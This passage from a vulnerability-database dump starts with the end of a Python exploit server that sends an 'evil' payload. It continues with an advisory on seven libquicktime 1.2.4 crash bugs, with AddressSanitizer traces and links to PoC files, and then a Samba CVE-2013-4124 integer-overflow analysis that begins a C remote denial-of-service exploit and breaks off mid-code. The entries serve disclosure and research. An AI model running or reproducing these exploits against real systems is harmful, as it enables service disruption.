addr = s.accept()\r\nprint \"[+] Connection accepted from: %s\" % (addr[0])\r\nc.recv(1024)\r\nc.send(evil)\r\nraw_input(\"[+] Done, press enter to quit\")\r\nc.close()\r\ns.close()\r\n\r\n\r\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9072"}], "exploitdb": [{"lastseen": "2017-06-10T00:14:07", "bulletinFamily": "exploit", "description": "libquicktime 1.2.4 - Denial of Service. CVE-2017-9122,CVE-2017-9123,CVE-2017-9124,CVE-2017-9125,CVE-2017-9126,CVE-2017-9127,CVE-2017-9128. Dos exploit for Li...", "modified": "2017-06-09T00:00:00", "published": "2017-06-09T00:00:00", "id": "EDB-ID:42148", "href": "https://www.exploit-db.com/exploits/42148/", "type": "exploitdb", "title": "libquicktime 1.2.4 - Denial of Service", "sourceData": "libquicktime multiple vulnerabilities\r\n\r\n\r\n================\r\nAuthor : qflb.wu\r\n===============\r\n\r\n\r\nIntroduction:\r\n=============\r\nThe libquicktime package contains the libquicktime library, various plugins and codecs, along with graphical and command line utilities used for encoding and decoding QuickTime files. This is useful for reading and writing files in the QuickTime format. The goal of the project is to enhance, while providing compatibility with the Quicktime 4 Linux library.\r\n\r\n\r\nAffected version:\r\n=====\r\n1.2.4\r\n\r\n\r\nVulnerability Description:\r\n==========================\r\n##################################\r\n1.\r\nthe quicktime_read_moov function in moov.c in libquicktime 1.2.4 can cause a denial of service(infinite loop and CPU consumption) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_moov_infinite_loop.mp4\r\nCVE:\r\nCVE-2017-9122\r\n\r\n\r\n###################################\r\n2.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(invalid memory read and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\n\r\n\r\nASAN:SIGSEGV\r\n=================================================================\r\n==14254==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x7f31e6ae7185 sp 0x7ffed033a270 bp 0x0000006bdb50 T0)\r\n==14254==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7f31e6ae7184 (/usr/local/lib/libquicktime.so.0+0x6c184)\r\n #1 0x49b1c6 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x49b1c6)\r\n #2 0x47fbaa (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fbaa)\r\n #3 0x7f31e43b2ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #4 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14254==ABORTING\r\n\r\n\r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n...\r\nStopped reason: SIGSEGV\r\n0x00007ffff7829185 in lqt_frame_duration (file=<optimized out>, track=<optimized out>, \r\n constant=<optimized out>) at lqt_quicktime.c:1242\r\n1242 return\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_invalid_memory_read.mp4\r\nCVE:\r\nCVE-2017-9123\r\n\r\n\r\n###################################\r\n3.\r\nthe quicktime_match_32 in util.c in libquicktime 1.2.4 can cause a denial of service(NULL pointer dereference and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\n\r\n\r\nASAN:SIGSEGV\r\n=================================================================\r\n==14359==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7fe8af6b85d8 sp 0x7fff490cd4e0 bp 0x7fff490cd5b0 T0)\r\n==14359==WARNING: Trying to symbolize code, but external symbolizer is not initialized!\r\n #0 0x7fe8af6b85d7 (/usr/local/lib/libquicktime.so.0+0x3605d7)\r\n #1 0x7fe8af68b566 (/usr/local/lib/libquicktime.so.0+0x333566)\r\n #2 0x7fe8af63c71a (/usr/local/lib/libquicktime.so.0+0x2e471a)\r\n #3 0x7fe8af3d1658 (/usr/local/lib/libquicktime.so.0+0x79658)\r\n #4 0x7fe8af3d84a8 (/usr/local/lib/libquicktime.so.0+0x804a8)\r\n #5 0x7fe8af3a95da (/usr/local/lib/libquicktime.so.0+0x515da)\r\n #6 0x47fad2 (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47fad2)\r\n #7 0x7fe8acc8fec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\nAddressSanitizer can not provide additional info.\r\nSUMMARY: AddressSanitizer: SEGV ??:0 ??\r\n==14359==ABORTING\r\n\r\n\r\ndebug info:\r\nProgram received signal SIGSEGV, Segmentation fault.\r\nStopped reason: SIGSEGV\r\n0x00007ffff7b1d5d8 in quicktime_match_32 (_input=<optimized out>, \r\n _output=<optimized out>) at util.c:874\r\n874if(input[0] == output[0] &&\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_match_32_NULL_pointer_dereference.mp4\r\nCVE:\r\nCVE-2017-9124\r\n\r\n\r\n###################################\r\n4.\r\nthe lqt_frame_duration function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==40038==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cd4 at pc 0x7f28959fc45f bp 0x7ffefd561530 sp 0x7ffefd561528\r\nREAD of size 4 at 0x602000009cd4 thread T0\r\n #0 0x7f28959fc45e in lqt_frame_duration /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242\r\n #1 0x49b1c6 in quicktime_print_info /home/a/Downloads/libquicktime-1.2.4/utils/common.c:138\r\n #2 0x47fbaa in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:996\r\n #3 0x47fbaa in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #4 0x7f28932c7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #5 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009cd4 is located 3 bytes to the right of 1-byte region [0x602000009cd0,0x602000009cd1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f2895cad7d0 in quicktime_read_stts /home/a/Downloads/libquicktime-1.2.4/src/stts.c:115\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1242 lqt_frame_duration\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa 05 fa fa fa 05 fa fa fa 04 fa fa fa 05 fa\r\n 0x0c047fff9350: fa fa 00 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9360: fa fa 05 fa fa fa 00 fa fa fa 05 fa fa fa 05 fa\r\n 0x0c047fff9370: fa fa 05 fa fa fa 00 fa fa fa 00 00 fa fa 00 01\r\n 0x0c047fff9380: fa fa 04 fa fa fa 05 fa fa fa 00 fa fa fa 05 fa\r\n=>0x0c047fff9390: fa fa 05 fa fa fa 00 fa fa fa[01]fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==40038==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_lqt_frame_duration_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9125\r\n\r\n\r\n###################################\r\n5.\r\nthe quicktime_read_dref_table function in dref.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==41637==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009ce4 at pc 0x7f9cb9ad16e7 bp 0x7ffcf9a1e720 sp 0x7ffcf9a1e718\r\nWRITE of size 1 at 0x602000009ce4 thread T0\r\n #0 0x7f9cb9ad16e6 in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69\r\n #1 0x7f9cb9ad3bdd in quicktime_read_dref /home/a/Downloads/libquicktime-1.2.4/src/dref.c:147\r\n #2 0x7f9cb9ad0388 in quicktime_read_dinf /home/a/Downloads/libquicktime-1.2.4/src/dinf.c:56\r\n #3 0x7f9cb9afdf09 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:220\r\n #4 0x7f9cb9afaa9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #5 0x7f9cb9b4ff1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #6 0x7f9cb9b0172a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #7 0x7f9cb9896658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #8 0x7f9cb989d4a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #9 0x7f9cb986e5da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #10 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #11 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #12 0x7f9cb7154ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #13 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009ce4 is located 12 bytes to the left of 1-byte region [0x602000009cf0,0x602000009cf1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f9cb9ad13ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/dref.c:69 quicktime_read_dref_table\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa 01 fa\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41637==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_read_dref_table_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9126\r\n\r\n\r\n###################################\r\n6.\r\nthe quicktime_user_atoms_read_atom function in useratoms.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==41642==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009cb1 at pc 0x7f3aa15d47f3 bp 0x7ffc98430d00 sp 0x7ffc98430cf8\r\nWRITE of size 1 at 0x602000009cb1 thread T0\r\n #0 0x7f3aa15d47f2 in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84\r\n #1 0x7f3aa1590bd8 in quicktime_read_stsd_video /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:557\r\n #2 0x7f3aa1594eb8 in quicktime_read_stsd_table /home/a/Downloads/libquicktime-1.2.4/src/stsdtable.c:694\r\n #3 0x7f3aa158bd4d in quicktime_finalize_stsd /home/a/Downloads/libquicktime-1.2.4/src/stsd.c:336\r\n #4 0x7f3aa1566147 in quicktime_read_minf /home/a/Downloads/libquicktime-1.2.4/src/minf.c:231\r\n #5 0x7f3aa1562a9e in quicktime_read_mdia /home/a/Downloads/libquicktime-1.2.4/src/mdia.c:155\r\n #6 0x7f3aa15b7f1e in quicktime_read_trak /home/a/Downloads/libquicktime-1.2.4/src/trak.c:247\r\n #7 0x7f3aa156972a in quicktime_read_moov /home/a/Downloads/libquicktime-1.2.4/src/moov.c:221\r\n #8 0x7f3aa12fe658 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1791\r\n #9 0x7f3aa13054a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #10 0x7f3aa12d65da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #11 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #12 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #13 0x7f3a9ebbcec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #14 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009cb1 is located 0 bytes to the right of 1-byte region [0x602000009cb0,0x602000009cb1)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f3aa15d451a in quicktime_user_atoms_read_atom /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:81\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/useratoms.c:84 quicktime_user_atoms_read_atom\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9340: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9350: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9360: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9370: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c047fff9380: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n=>0x0c047fff9390: fa fa fa fa fa fa[01]fa fa fa 00 fa fa fa 00 04\r\n 0x0c047fff93a0: fa fa 00 00 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==41642==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_user_atoms_read_atom_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9127\r\n\r\n\r\n###################################\r\n7.\r\nthe quicktime_video_width function in lqt_quicktime.c in libquicktime 1.2.4 can cause a denial of service(heap-buffer-overflow and application crash) via a crafted mp4 file.\r\n\r\n\r\n./lqtplay libquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\n\r\n\r\n=================================================================\r\n==10979==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000009d00 at pc 0x7f36a1017a37 bp 0x7ffe65a90010 sp 0x7ffe65a90008\r\nREAD of size 4 at 0x602000009d00 thread T0\r\n #0 0x7f36a1017a36 in quicktime_video_width /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998\r\n #1 0x7f36a1017a36 in quicktime_init_maps /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1633\r\n #2 0x7f36a101af13 in quicktime_read_info /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:1891\r\n #3 0x7f36a10204a8 in do_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2026\r\n #4 0x7f36a0ff15da in quicktime_open /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:2075\r\n #5 0x47fad2 in qt_init /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:987\r\n #6 0x47fad2 in main /home/a/Downloads/libquicktime-1.2.4/utils/lqtplay.c:1852\r\n #7 0x7f369e8d7ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)\r\n #8 0x47f3dc in _start (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x47f3dc)\r\n\r\n\r\n0x602000009d00 is located 4 bytes to the right of 12-byte region [0x602000009cf0,0x602000009cfc)\r\nallocated by thread T0 here:\r\n #0 0x4692f9 in malloc (/home/a/Downloads/libquicktime-1.2.4/utils/.libs/lqtplay+0x4692f9)\r\n #1 0x7f36a12543ba in quicktime_read_dref_table /home/a/Downloads/libquicktime-1.2.4/src/dref.c:66\r\n\r\n\r\nSUMMARY: AddressSanitizer: heap-buffer-overflow /home/a/Downloads/libquicktime-1.2.4/src/lqt_quicktime.c:998 quicktime_video_width\r\nShadow bytes around the buggy address:\r\n 0x0c047fff9350: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9360: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9370: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd\r\n 0x0c047fff9380: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa\r\n 0x0c047fff9390: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 04\r\n=>0x0c047fff93a0:[fa]fa 00 04 fa fa 00 fa fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93b0: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 00 00\r\n 0x0c047fff93c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\n 0x0c047fff93d0: fa fa 00 00 fa fa 00 fa fa fa fd fd fa fa fd fd\r\n 0x0c047fff93e0: fa fa fd fd fa fa 00 04 fa fa 00 00 fa fa fd fa\r\n 0x0c047fff93f0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n ASan internal: fe\r\n==10979==ABORTING\r\n\r\n\r\nPOC:\r\nlibquicktime_1.2.4_quicktime_video_width_heap-buffer-overflow.mp4\r\nCVE:\r\nCVE-2017-9128\r\n\r\n\r\n\r\n\r\n=================================\r\n\r\n\r\nqflb.wu () dbappsecurity com cn\r\n\r\n\r\nProofs of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42148.zip\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/42148/"}, {"lastseen": "2016-02-03T06:42:26", "bulletinFamily": "exploit", "description": "Samba nttrans Reply - Integer Overflow Vulnerability. CVE-2013-4124. Dos exploit for linux platform", "modified": "2013-08-22T00:00:00", "published": "2013-08-22T00:00:00", "id": "EDB-ID:27778", "href": "https://www.exploit-db.com/exploits/27778/", "type": "exploitdb", "title": "Samba nttrans Reply - Integer Overflow Vulnerability", "sourceData": "Exploitation: samba nttrans reply integer overflow\r\n\r\n ___ ___ \r\n / _ \\ / _ \\ \r\n __ __| (_) || | | | ___ \r\n \\ \\/ / \\__. || | | | / __| \r\n > < / / | |_| || (__ \r\n /_/\\_\\ /_/ \\___/ \\___|\r\n\r\n\r\nCVE-2013-4124 samba integer overflow in nttrans \r\nreply reading ea_list\r\n\r\nvulnerable samba daemon has a integer overflow \r\nto cause remote dos by nttrans reply while the \r\ndaemon reading ea_list. In the detail, unsigned\r\ndata type offset variable in vulnerable function \r\nof read_nttrans_ea_list can be wrap up! security\r\nbug! \r\n\r\n\r\nx90c\r\n\r\n[vulnerable versions]\r\n - samba 3.5.22 <=\r\n - samba 3.6.17 <=\r\n - samba 4.0.8 <=\r\n\r\n[call graph]\r\n+reply_nttrans\t// reply nttrans\r\n +->handle_nttrans\r\n +-> call_nt_transact_create\t// transact!\r\n -> read_nttrns_ea_list(vulnerable function)\r\n\r\n[security bug analyze]\r\nsmbd/nttrans.c\r\n---- snip ---- snip ---- snip ---- snip ----\r\n971 /****************************************************************************\r\n 972 Read a list of EA names and data from an incoming data buffer. Create an ea_list with them.\r\n 973 ****************************************************************************/\r\n 974 EA names, data from samba incoming buffer!\r\n 975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata, size_t data_size)\t// *pdata is inject vector\r\n 976 {\r\n 977 struct ea_list *ea_list_head = NULL;\r\n 978 size_t offset = 0;\t// unisigned\r\n 979 \r\n 980 if (data_size < 4) {\r\n 981 return NULL;\r\n 982 }\r\n 983 \r\n 984 while (offset + 4 <= data_size) {\t// XXX (3) if offset is wrap up then it enters the loop continuly\r\n 985 size_t next_offset = IVAL(pdata,offset);\t// unsigned XXX (1) if next_offset from pdata pointer is much large value then to lead integer wrap!\r\n// XXX (4) may memory corruption point! if offset is wrap up then second argv pointer(pdata+offset+4) pointers around zero memory then smb dos! \r\n 986 struct ea_list *eal = read_ea_list_entry(ctx, pdata + offset + 4, data_size - offset - 4, NULL);\r\n 987 \r\n 988 if (!eal) {\r\n 989 return NULL;\r\n 990 }\r\n 991 \r\n 992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *);\r\n 993 if (next_offset == 0) {\r\n 994 break;\r\n 995 }\r\n 996 \r\n 997 /* Integer wrap protection for the increment. */\t\t// XXX patch code\r\n 998 if (offset + next_offset < offset) {\r\n 999 break;\r\n1000 }\r\n1001 \r\n1002 offset += next_offset;\t// XXX (2) if next_offset is large value then offset is wrap!\r\n1003 \r\n1004 /* Integer wrap protection for while loop. */\t// XXX patch code\r\n1005 if (offset + 4 < offset) {\r\n1006 break;\r\n1007 }\r\n1008 \r\n1009 }\r\n1010 \r\n1011 return ea_list_head;\r\n1012 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n---- snip ---- snip ---- snip ---- snip ----\r\n1014 /****************************************************************************\r\n1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's).\r\n1016 ****************************************************************************/\r\n1017 \r\n1018 static void call_nt_transact_create(connection_struct *conn,\r\n1019 struct smb_request *req,\r\n1020 uint16 **ppsetup, uint32 setup_count,\r\n1021 char **ppparams, uint32 parameter_count,\r\n1022 char **ppdata, uint32 data_count,\r\n1023 uint32 max_data_count)\r\n1024 {\r\n...\r\n1148 /* We have already checked that ea_len <= data_count here. */\r\n1149 ea_list = read_nttrans_ea_list(talloc_tos(), data + sd_len,\r\n1150 ea_len);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n---- snip ---- snip ---- snip ---- snip ----\r\n2639 static void handle_nttrans(connection_struct *conn,\r\n2640 struct trans_state *state,\r\n2641 struct smb_request *req)\r\n2642 {\r\n...\r\n2651 /* Now we must call the relevant NT_TRANS function */\r\n2652 switch(state->call) {\r\n2653 case NT_TRANSACT_CREATE:\t// NT_TRANSACT_CREATE!\r\n2654 {\r\n2655 START_PROFILE(NT_transact_create);\r\n2656 call_nt_transact_create(\r\n2657 conn, req,\r\n2658 &state->setup, state->setup_count,\r\n2659 &state->param, state->total_param,\r\n2660 &state->data, state->total_data,\r\n2661 state->max_data_return);\r\n2662 END_PROFILE(NT_transact_create);\r\n2663 break;\r\n2664 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n---- snip ---- snip ---- snip ---- snip ----\r\n2770 /****************************************************************************\r\n2771 Reply to a SMBNTtrans.\r\n2772 ****************************************************************************/\r\n2773 \r\n2774 void reply_nttrans(struct smb_request *req)\t// smb_request!\r\n2775 {\r\n...\r\n2945 if ((state->received_data == state->total_data) &&\r\n2946 (state->received_param == state->total_param)) {\r\n2947 handle_nttrans(conn, state, req);\r\n---- snip ---- snip ---- snip ---- snip ----\r\n\r\n[exploitability]\r\n\r\n * keywords:\r\n - samba incoming data\r\n - EA names\r\n - data\r\n - 0xf1000000\r\n - SMB NTTRANS\r\n - Samba reply_nttrans() Remote Root Exploit\r\n (http://www.securiteam.com/exploits/5TP0M2AAKS.html)\r\n - SMB_COM_NT_TRANSACT(0xa0) = NTtrans (32-bit field)\r\n - SMBtrans\r\n - http://ubiqx.org/cifs/SMB.html\r\n\r\n\r\nThe security bug is remote dos to a daemon, the \r\nimpact is exist even though it's exploited on \r\nlocal network. If large local network exist and \r\nmany samba on the network, security risk is exist. \r\nI assign the dos impact to medium, and the apache \r\nor wuftpd dos to high because they are can be \r\nexploited on internet\r\n\r\n/*\r\n\r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n\r\n CVE-2013-4124 samba remote dos private exploit\r\n\r\n \r\n ./samba_nttrans_exploit [target ip addr]\r\n\r\n * ... test ...:\r\n I didn't test for the exploit, I \r\n copied another samba nttrans exploit \r\n in 2003 that http://www.securiteam.co\r\n m/exploits/5TP0M2AAKS.html. It should \r\n be works!\r\n \r\n the exploit send malformed nttrans \r\n smb packet with large value of data \r\n offset to cause integer wrap in the \r\n vulnerable function of read_nttrns_ea_list\r\n\r\n I left an article that analyzed it\r\n \r\n !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!! PRIVATE !!!!!\r\n\r\n\r\n x90c\r\n\r\n*/\r\n\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include <signal.h>\r\n\r\ntypedef unsigned char uint8;\r\ntypedef unsigned short uint16;\r\ntypedef unsigned long uint32;\r\n\r\nstruct variable_data_header\r\n{ uint8 wordcount, bytecount[2];\r\n};\r\n\r\nstruct nbt_session_header\r\n{ uint8 type, flags, len[2];\r\n};\r\n\r\nstruct smb_base_header\r\n{ uint8 protocol[4], command, 